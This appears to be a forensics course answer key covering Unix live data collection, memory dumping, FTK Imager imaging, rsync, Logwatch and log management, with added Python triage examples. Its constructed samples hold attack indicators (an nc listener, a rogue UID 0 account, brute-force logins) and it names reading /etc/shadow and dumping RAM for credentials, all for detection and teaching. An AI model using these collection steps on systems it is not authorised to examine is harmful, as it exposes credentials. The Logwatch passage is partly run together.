Data collection
- Currently loaded kernel modules: lsmod
- Boot-time messages: dmesg
- User accounts and groups, passwords: /etc/passwd, /etc/shadow, /etc/group
- Logged-on users: who
- Current user: whoami
Process-to-port correlation
This is conducted by querying the subject system with a combination of the netstat, lsof and fuser commands.
Command: netstat -anp (shows every socket with the PID and program that owns it; on newer systems ss -anp)
Routing information using the netstat command
The native netstat -rn and route commands display the current routing table and gateways for all the routes on the suspicious computer.
Command: netstat -rn
Examining data in the ARP cache
This command displays the IP-to-MAC address mappings the suspicious computer has recently used, which reveals other hosts it talked to and possible ARP spoofing.
Command: arp -a
Dumping RAM
The process of capturing memory is known as dumping. Memory dumps are a valuable source of ephemeral evidence and volatile information; they may contain passwords to encrypted volumes, account login credentials for webmail, social network and file sharing services, and so on.
Linux memory is exposed through /dev/mem, but user access to it is restricted by the kernel, so loadable kernel modules such as fmem and LiME are used to provide direct access to memory.
Using fmem: fmem is a kernel module that creates the device /dev/fmem, similar to /dev/mem but without those limitations, so the whole physical memory can be copied with dd.
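Collecting these artifacts is only half the job; the investigator then has to find the outliers in them. As an added example (not part of the original answer), the Python below parses captured netstat -anp output to do the process-to-port correlation described above, flagging listeners not owned by a known-good program and established connections the host initiated, and checks /etc/passwd for a second UID 0 account and home directories in /tmp. Both inputs are constructed samples, not output from a real host, and the baseline of expected programs is an assumption for the demonstration.

```python
"""Triage of UNIX artifacts collected with netstat -anp and /etc/passwd.

Added example (not from the original answer): both inputs are constructed
samples, and the baseline of expected listeners is an assumption.
"""
import re

NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      955/mysqld
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2931/nc
tcp        0      0 192.168.56.101:22       192.168.56.1:51522      ESTABLISHED 1201/sshd: bob [priv]
tcp        0      0 192.168.56.101:48122    203.0.113.7:443         ESTABLISHED 2977/python
udp        0      0 0.0.0.0:68              0.0.0.0:*                           610/dhclient
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:Bob:/home/bob:/bin/bash
toor:x:0:0::/tmp/.x:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# The State column is absent for UDP, so it is optional in the pattern.
_NETSTAT_LINE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)"
    r"\s+(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+|-)/(?P<prog>.*)$")


def parse_netstat(text):
    """Return one dict per socket line, with the local port split out."""
    sockets = []
    for line in text.splitlines():
        m = _NETSTAT_LINE.match(line)
        if not m:
            continue  # header and blank lines
        host, port = m.group("local").rsplit(":", 1)
        sockets.append({"proto": m.group("proto"), "local_host": host, "local_port": int(port),
                        "foreign": m.group("foreign"), "state": m.group("state"),
                        "pid": m.group("pid"),
                        "prog": m.group("prog").split()[0].rstrip(":")})  # "sshd: bob [priv]" -> sshd
    return sockets


def unexpected_listeners(sockets, baseline=("sshd", "mysqld", "dhclient")):
    """Listening sockets owned by a program that is not in the known-good baseline."""
    return [s for s in sockets if s["state"] == "LISTEN" and s["prog"] not in baseline]


def outbound_connections(sockets):
    """Established connections this host initiated (local port is not a listener): candidate C2."""
    listening = {s["local_port"] for s in sockets if s["state"] == "LISTEN"}
    return [s for s in sockets if s["state"] == "ESTABLISHED" and s["local_port"] not in listening]


def suspicious_accounts(passwd_text):
    """Accounts that share UID 0 with root, or whose home directory lives under /tmp or /dev/shm."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, uid, home = fields[0], int(fields[2]), fields[5]
        reasons = []
        if uid == 0 and name != "root":
            reasons.append("uid 0")
        if home.startswith(("/tmp", "/dev/shm")):
            reasons.append("home in " + home)
        if reasons:
            found.append((name, reasons))
    return found


if __name__ == "__main__":
    socks = parse_netstat(NETSTAT_OUTPUT)
    for s in unexpected_listeners(socks):
        print("unexpected listener:", s["proto"], s["local_port"], s["pid"], s["prog"])
    for s in outbound_connections(socks):
        print("outbound:", s["local_port"], "->", s["foreign"], s["pid"], s["prog"])
    for name, why in suspicious_accounts(PASSWD):
        print("account:", name, why)
```

The PIDs it returns are the ones to chase with ps -elf, lsof -p <pid> and ls -l /proc/<pid>/exe; running this against a live host requires the commands to be trusted (a rootkit can filter netstat's output), which is why memory dumps and offline analysis of the disk image are also taken.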
7.a Why do we need FTK Imager? Explain the procedure for creating a disk image and recovering permanently deleted files using FTK Imager.
Ans: AccessData produces a commercial forensic examination suite called the Forensic Toolkit (FTK); FTK Imager is its free acquisition tool. It allows the user to create images of physical disks, logical drives and even folders without altering the source, and it can save images in multiple formats (raw/dd, E01, SMART, AFF). It is needed because analysis must be done on a verified copy, never on the original evidence, and because its hash verification proves that the copy is identical to the source.
Procedure:
Step 1: Launch FTK Imager by clicking the AccessData FTK Imager icon (connect the evidence drive through a write blocker first).
Step 2: Click File and look over the various options for creating images.
Step 3: Click Create Disk Image. Select the correct source type for the situation (Physical Drive, Logical Drive, Image File or Contents of a Folder).
Step 4: Select the desired drive in the resulting Select Drive window. Click Finish.
Step 5: The image source has now been selected. Click Add to select the image type and choose the image destination.
Step 6: Select the desired image format. Click Next.
Step 7: A window is displayed to fill in the case information (case number, evidence number, description, examiner) for organisational purposes. Fill it in and click Next.
Step 8: Select the folder in which the image file will be placed.
Step 9: The Image Fragment Size field specifies the number of megabytes into which FTK Imager should split the image file (0 means a single file).
Step 10: The disk image will be saved to the investigating drive. Tick "Verify images after they are created", then click Start to create the image file.
Step 11: The image will be created. This may take some time depending on the size of the drive.
Step 12: Both MD5 and SHA1 hash values are computed for the image file and compared with the hashes of the source.
Step 13: Click Image Summary to view the results pertaining to the image that has just been created. This information should verify what was entered in the creation process and that the computed and stored hashes match.
Recovering permanently deleted files: open the image with File > Add Evidence Item, expand the file system in the Evidence Tree; deleted files appear with a red X icon. Right-click them and choose Export Files to recover them. Unallocated space can be exported the same way for file carving.
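Steps 9 to 13 (fragment size, verification, MD5/SHA1 hashes) are the part of the procedure that makes the image admissible, so they are worth seeing in code. The following is an added example, not FTK Imager's code: it writes a raw (dd-style) image split into numbered fragments, computes MD5 and SHA1 over the whole stream while writing, and re-verifies by reading the fragments back in order, as the "Verify images after they are created" option does. The "drive" contents are constructed bytes; the .001, .002 fragment naming follows FTK's raw format.

```python
"""Fragmented raw imaging with MD5/SHA1 verification, in the manner of FTK Imager.

Added example, not FTK Imager's code. The evidence bytes are constructed.
"""
import hashlib
import os
import tempfile


def acquire(source, dest_dir, base_name, fragment_size):
    """Copy 'source' (a file object) into numbered fragments; return paths and hashes."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    paths, index = [], 0
    size = fragment_size if fragment_size > 0 else -1   # 0 = one unsplit file (read(-1) reads all)
    while True:
        chunk = source.read(size)
        if not chunk:
            break
        index += 1
        path = os.path.join(dest_dir, f"{base_name}.{index:03d}")  # evidence.001, evidence.002, ...
        with open(path, "wb") as f:
            f.write(chunk)
        md5.update(chunk)
        sha1.update(chunk)
        paths.append(path)
    return {"fragments": paths, "md5": md5.hexdigest(), "sha1": sha1.hexdigest()}


def hash_fragments(paths, block=65536):
    """Hash the concatenation of the fragments, streaming so large images fit in RAM."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    for path in sorted(paths):   # .001, .002, ... keeps the stream order
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(block), b""):
                md5.update(chunk)
                sha1.update(chunk)
    return {"md5": md5.hexdigest(), "sha1": sha1.hexdigest()}


def verify(acquisition):
    """'Verify images after they are created': recompute and compare both hashes."""
    got = hash_fragments(acquisition["fragments"])
    return got["md5"] == acquisition["md5"] and got["sha1"] == acquisition["sha1"]


def demo(fragment_size=1024, tamper=False):
    """Image a constructed 10000-byte 'drive'; optionally flip a bit to show verification failing."""
    evidence = bytes((i * 7) % 256 for i in range(10000))  # constructed drive contents
    with tempfile.TemporaryDirectory() as tmp, tempfile.TemporaryFile() as src:
        src.write(evidence)
        src.seek(0)
        acq = acquire(src, tmp, "evidence", fragment_size)
        if tamper:  # simulate one flipped bit in the middle of the image set
            with open(acq["fragments"][len(acq["fragments"]) // 2], "r+b") as f:
                f.seek(10)
                b = f.read(1)
                f.seek(10)
                f.write(bytes([b[0] ^ 0x01]))
        return {"fragments": len(acq["fragments"]),
                "md5_matches_source": acq["md5"] == hashlib.md5(evidence).hexdigest(),
                "verified": verify(acq)}


if __name__ == "__main__":
    print("clean:   ", demo())
    print("tampered:", demo(tamper=True))
```

The source hash must be computed from the original device in the same pass as the copy (the acquisition hash), and the stored hash must travel with the image in the case notes; otherwise verification only proves that the image has not changed since the last time it was hashed.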
7.b What is an incident and incident response? Explain the needs and goals of IR.
Incident
An incident is a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.
Incident response
Incident response is a coordinated and structured approach to identify and resolve an incident.
Need for IR
- Incidents are inevitable and are becoming more complex in nature.
- Whenever an incident occurs, it is very important to have an approach that minimises its impact and consequences on business operations as soon as possible.
- A structured approach is required to resolve incidents quickly and effectively; with ad hoc approaches it can take months or even years to resolve them.
- The approach should make use of lessons learned from past incidents to prepare for handling future incidents effectively.
Goal of IR
- The main goal of incident response is to effectively remove the intrusion and threats from the affected systems, while minimising damage and restoring normal operations as quickly as possible.

UNIT 4
8.a What are the different types of storage devices? Give advantages and disadvantages.
Ans: Generally, storage types are classified into the following:
1. Local storage options
2. Remote storage options
External hard drive
- These are hard drives similar to the type installed within a desktop or laptop computer, the difference being that they can be plugged into the computer or removed and kept separate from the main computer.
Advantages
- A very good option for local backups of large amounts of data.
- The cheapest storage option in terms of cost per GB.
- Very reliable when handled with care.
Disadvantages
- Can be very delicate; may be damaged if dropped or through an electrical surge.
Solid state drive
- Solid state drives look and function like traditional mechanical/magnetic hard drives, but the similarities stop there: internally they are completely different.
- Solid state drives have no moving parts or rotating platters, which means that they use less power than traditional hard drives and are much faster too.
Advantages
- Faster read and write performance.
- More robust and reliable than traditional magnetic hard drives.
- Highly portable; can easily be taken off site.
Disadvantages
- Relatively expensive compared to traditional hard drives.
- Storage space is typically less than that of traditional magnetic hard drives in the same price bracket.
Network attached storage (NAS)
- A NAS is simply one or more regular IDE or SATA hard drives plugged into an array storage enclosure and connected to a network router or switch through an Ethernet port.
- Some of these NAS enclosures have ventilating fans to protect the hard drives from overheating.
Advantages
- A very good option for local backups, especially for networks and small businesses.
- As several hard drives can be plugged in, a NAS can hold very large amounts of data.
Disadvantages
- Significantly more expensive than using single external hard drives.
- Difficult to take off site.
- Very much a local backup, and hence still susceptible to events like theft, floods and fire.
USB thumb drive or flash drive
- USB thumb drives or flash drives are similar to solid state drives except that they are much smaller in size and capacity.
- They have no moving parts, which makes them quite robust.
Advantages
- The most portable storage option; it can fit on a keychain, making it an offsite backup when you bring it with you.
- Much more robust than traditional magnetic hard drives.
Disadvantages
- Relatively expensive per GB, so only suitable for backing up a small amount of data.
- Easily lost or stolen, so backups kept on them should be encrypted.
Optical drive (CD/DVD)
- They do not make good storage options for backups due to their shorter lifespan, small storage space and slower read and write speeds.
Advantages
- Low cost per disk.
Disadvantages
- Relatively shorter lifespan than other storage options.
- Not as reliable as other storage options like external hard disks and SSDs. One damaged disk in a backup set can make the whole backup unusable.
Cloud storage
- Cloud storage is storage space in a commercial data centre accessible from any computer with Internet access.
- It is usually provided by a service provider and is a remote storage option.
Advantages
- A very good offsite backup.
- Not affected by local events and disasters such as theft, floods and fire.
Disadvantages
- Requires an Internet connection to access the storage.
- More expensive than traditional external hard drives and usually requires an ongoing subscription.
- The data is held by a third party, so it should be encrypted before upload.

8.b What is the need for the rsync tool? Explain the options of the rsync tool. Write the commands for copying files to local systems and remote systems.
rsync (remote sync) is the most commonly used command for copying and synchronising files and directories, both remotely and locally, on Linux/Unix systems. With rsync you can copy and synchronise your data across directories, disks and networks, and perform backups and mirroring between two Linux machines. Because of its flexibility and speed it has become a standard Linux utility, included in all popular distributions.
Some advantages and features of rsync
1. It efficiently copies and syncs files to or from a remote system: only the parts of files that have changed are transferred (delta transfer), so repeated backups are fast.
2. It supports copying symbolic links, devices, owners, groups and permissions.
3. It consumes less bandwidth because it can compress data on the sending side and decompress it on the receiving side.
Options:
-a or --archive: a quick way of saying you want recursion and want to preserve almost all attributes of the source files (equivalent to -rlptgoD).
-v or --verbose: increases the amount of information you are given during the transfer (rsync works silently without it).
-z or --compress: rsync compresses the file data as it is sent to the destination machine, which reduces the amount of data transmitted; useful over a slow connection (it costs CPU, so it gains nothing for local copies or already-compressed data).
--progress: tells rsync to print information showing the progress of the transfer. It implies --verbose if that was not already specified.
-h or --human-readable: prints sizes in K, M and G units.
-e ssh: runs the remote copy over SSH, so the transfer is encrypted and authenticated.
-n or --dry-run: shows what would be transferred without changing anything; use it before any run with --delete.
Commands
To a local system (copy /root/rpmpkgs into /tmp/backups):
rsync -avz /root/rpmpkgs /tmp/backups
To a remote system over SSH (user@host is a placeholder for the account and address of the backup server):
rsync -avzhe ssh backup.tar user@host:/backups/

9.a What is a log? Explain the uses of logs and the types of logs. How to install and configure the Logwatch tool on a system.
Ans: A log is a record of the events occurring within an organisation's systems and networks. Logs are composed of log entries; each entry contains information related to a specific event that has occurred within a system or network.
Logs are useful for:
a. Performing auditing and forensic analysis
b. Supporting the organisation's internal investigations
c. Establishing baselines
d. Identifying operational trends and long-term problems
Types of logs
1. Security software logs
Most organisations use several types of network-based and host-based security software to detect malicious activity, protect systems and data, and support incident response efforts. Accordingly, security software (firewalls, IDS/IPS, anti-malware, VPN and authentication servers) is a major source of computer security log data.
2. Operating system logs
Operating systems for servers, workstations and networking devices (e.g. routers, switches) usually log a variety of information related to security: system events (service start/stop, failures) and audit records (authentication attempts, privilege use, file access).
3. Application logs
Operating systems and security software provide the foundation and protection for applications, which are used to store, access and manipulate the data used for the organisation's business processes. The following are some of the most commonly logged types of information from applications:
1. Client requests and server responses
Account and Usage information Install and configure Log Watch tool: Logwatch is an application that helps with simple log management by daily analyzing and reporting a short digest from activities taking place on your machine. To install Logwatch on Ubuntu / Debian, run the following: $ sudo apt-get install -y logwatch Now that we have Logwatch installed, let’s work on running logwatch manually. Configuring Logwatch Although its settings can be overridden during each run manually, in general, you will want to have Logwatch running daily, using common configuration. The default configuration file for Logwatch is located at: /usr/share/logwatch/default.conf/logwatch.conf The configuration file has a long list of variables which you can modify either during the manual run or directly in the configuration file itself. 1.The e-mail address to which daily digest (reports) are sent MailTo = root(targetn email) Replace root with your email address. Example: MailTo = [email protected] 2. The e-mail address from which these reports originate MailFrom = Logwatch You might wish to replace Logwatch with your own email again. Example: MailFrom = [email protected] 3. Setting the range for the reports. Default: Range = yesterday You have options of receiving reports for All (all available since the beginning), Today (just today) or Yesterday (just yesterday).(week) Example: Range = Today 4. Setting the reports' detail Default: Detail = Low You can modify the reports' detail here. Options are: Low, Medium and High. Example: Detail = Medium 5. Setting services (applications) to be analysed By default, Logwatch covers a really wide range of services. If you would like to see a full list, you can query the contents of the file scripts/services located at /usr/share/logwatch/. Example: ls -l /usr/share/logwatch/scripts/services 9b. Explain about Log Management Infrastructure Tiers and functionalities of log management infrastructure. 
Ans: A log management infrastructure typically comprises the following three tiers:
1. Log Generation
2. Log Analysis and Storage
3. Log Monitoring
Log Generation: The first tier contains the hosts that generate the log data. Some hosts run logging client applications or services that make their log data available through the network to the log servers in the second tier; other hosts let the log servers authenticate to them and retrieve copies of the log files.
Log Analysis and Storage: The second tier is composed of one or more log servers that receive log data or copies of log data from the hosts in the first tier. The data is transferred to the servers either in a real-time or near-real-time manner, or in occasional batches based on a schedule or the amount of log data waiting to be transferred.
Log Monitoring: The third tier contains consoles that may be used to monitor and review log data and the results of automated analysis.
Functions of a Log Management Infrastructure:
The following are common log management infrastructure functions, grouped by where in the infrastructure they are performed:
• General functions: log parsing, event filtering, event aggregation
• Storage functions: log rotation, log archival, log compression, log reduction, log conversion, log file integrity checking
• Analysis functions: event correlation, log viewing, log reporting
• Disposal: log clearing
Log parsing: Log parsing is extracting data from a log so that the parsed values can be used as input for another logging process.
Event filtering: Event filtering is the suppression of log entries from analysis, reporting, or long-term storage because their characteristics indicate that they are unlikely to contain information of interest.
Event aggregation: In event aggregation, similar entries are consolidated into a single entry containing a count of the number of occurrences of the event.
Log rotation: Log rotation is closing a log file and opening a new one when the previous file is considered to be complete (for example on a schedule or when it reaches a size limit).
Log archival: Log archival is retaining logs for an extended period of time, typically on removable media, a Storage Area Network (SAN), or a specialized log archival appliance or server.
Logs often need to be preserved to meet legal or regulatory requirements.
Log compression: Log compression is storing a log file in a way that reduces the amount of storage space needed for the file without altering its contents. Log compression is often performed when logs are rotated or archived.
Log reduction: Log reduction is removing unnecessary entries from a log to create a new log that is smaller. A similar process is event reduction, which removes unneeded data fields from all log entries.
Log conversion: Log conversion is parsing a log in one format and storing its entries in a second format.
Log file integrity checking: Log file integrity checking involves calculating a message digest for each file and storing the message digest securely, so that changes to archived logs are detected. The digest must be kept where the log host cannot rewrite it (on a separate host, on write-once media, or signed); a digest stored next to the log can simply be recomputed by an attacker who alters the log.
Event correlation: Simply put, event correlation is finding relationships between two or more log entries. The most common form of event correlation is rule-based correlation, which matches multiple log entries from a single source or multiple sources based on logged values, such as timestamps, IP addresses, and event types.
Log viewing: Log viewing is displaying log entries in a human-readable format. Most log generators provide some sort of log viewing capability; third-party log viewing utilities are also available. Some log viewers provide filtering and aggregation capabilities.
Log reporting: Log reporting is displaying the results of log analysis. This is similar to the dashboard of a website, where you can see the number of visits to the site in a specified time range.
Log clearing: Log clearing is removing all entries from a log that precede a certain date and time. Log clearing is often performed to remove old log data that is no longer needed on a system because it is not of importance or because it has already been archived.
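The parsing, filtering, aggregation, correlation and integrity-checking functions described above, as an added worked example; this is not code from the original answer key or from any log management product. It runs over a handful of constructed syslog-style sshd lines (the host web01 and the addresses 203.0.113.9 and 198.51.100.x are made up), and the correlation rule it applies (three or more failed logins from one address followed by an accepted login from the same address) is an assumed example rule:

```python
"""Miniature log management pipeline: log parsing, event filtering, event
aggregation, rule-based event correlation and log file integrity checking.
Added example; the sample log below is constructed (host and IPs are made up)."""
import hashlib
import re
from collections import Counter

# Constructed syslog-style sshd sample (not a real capture).
SAMPLE_LOG = """\
Mar 10 02:14:01 web01 CRON[812]: (root) CMD (run-parts /etc/cron.hourly)
Mar 10 02:14:07 web01 sshd[901]: Failed password for root from 203.0.113.9 port 51022 ssh2
Mar 10 02:14:09 web01 sshd[901]: Failed password for root from 203.0.113.9 port 51022 ssh2
Mar 10 02:14:12 web01 sshd[901]: Failed password for root from 203.0.113.9 port 51022 ssh2
Mar 10 02:14:15 web01 sshd[903]: Accepted password for root from 203.0.113.9 port 51030 ssh2
Mar 10 02:15:00 web01 sshd[910]: Failed password for alice from 198.51.100.4 port 40011 ssh2
Mar 10 02:16:30 web01 sshd[915]: Accepted publickey for bob from 198.51.100.7 port 40100 ssh2
"""

# Log parsing: split a raw line into the fields the later stages consume.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[\w-]+)\[\d+\]: (?P<msg>.*)$")
AUTH_RE = re.compile(
    r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+")


def parse(text):
    """Return one dict per parseable line; lines that do not match are dropped
    (a production parser would count them, since gaps are themselves a signal)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        auth = AUTH_RE.match(ev["msg"]) if ev["prog"] == "sshd" else None
        if auth:
            ev.update(auth.groupdict())
        events.append(ev)
    return events


def filter_auth(events):
    """Event filtering: keep only authentication outcomes, drop cron noise etc."""
    return [e for e in events if e.get("result") in ("Accepted", "Failed")]


def aggregate_failures(events):
    """Event aggregation: collapse repeated failures into (user, ip) -> count."""
    return Counter((e["user"], e["ip"]) for e in events if e.get("result") == "Failed")


def correlate_bruteforce(events, threshold=3):
    """Rule-based correlation across entries: at least `threshold` failed logins
    from an address followed later by an accepted login from the same address."""
    failures = Counter()
    hits = []
    for e in events:
        if e.get("result") == "Failed":
            failures[e["ip"]] += 1
        elif e.get("result") == "Accepted" and failures[e["ip"]] >= threshold:
            hits.append({"ip": e["ip"], "user": e["user"],
                         "failures": failures[e["ip"]], "at": e["ts"]})
    return hits


def digest(data: bytes) -> str:
    """Log file integrity checking, step 1: SHA-256 of the archived log bytes.
    Store the result away from the log host (or sign it); a digest kept next to
    the log can be recomputed by whoever edits the log."""
    return hashlib.sha256(data).hexdigest()


def verify(data: bytes, stored_digest: str) -> bool:
    """Step 2: recompute and compare; False means the archive was altered."""
    return digest(data) == stored_digest


if __name__ == "__main__":
    auth = filter_auth(parse(SAMPLE_LOG))
    print("failures per (user, ip):", dict(aggregate_failures(auth)))
    print("correlated brute-force hits:", correlate_bruteforce(auth))
    stored = digest(SAMPLE_LOG.encode())
    tampered = SAMPLE_LOG.replace("Accepted password for root", "Failed password for root")
    print("original intact:", verify(SAMPLE_LOG.encode(), stored))
    print("tampered intact:", verify(tampered.encode(), stored))
```

The correlation step is the one that only a pipeline can do: no single entry in the sample is alarming on its own, but the three failures followed by a success from 203.0.113.9 are. The tampering check at the end shows why the digest has to live somewhere the log host cannot write: flipping one "Accepted" to "Failed" is exactly the edit an intruder would make, and it is only caught because the stored digest was computed before the change.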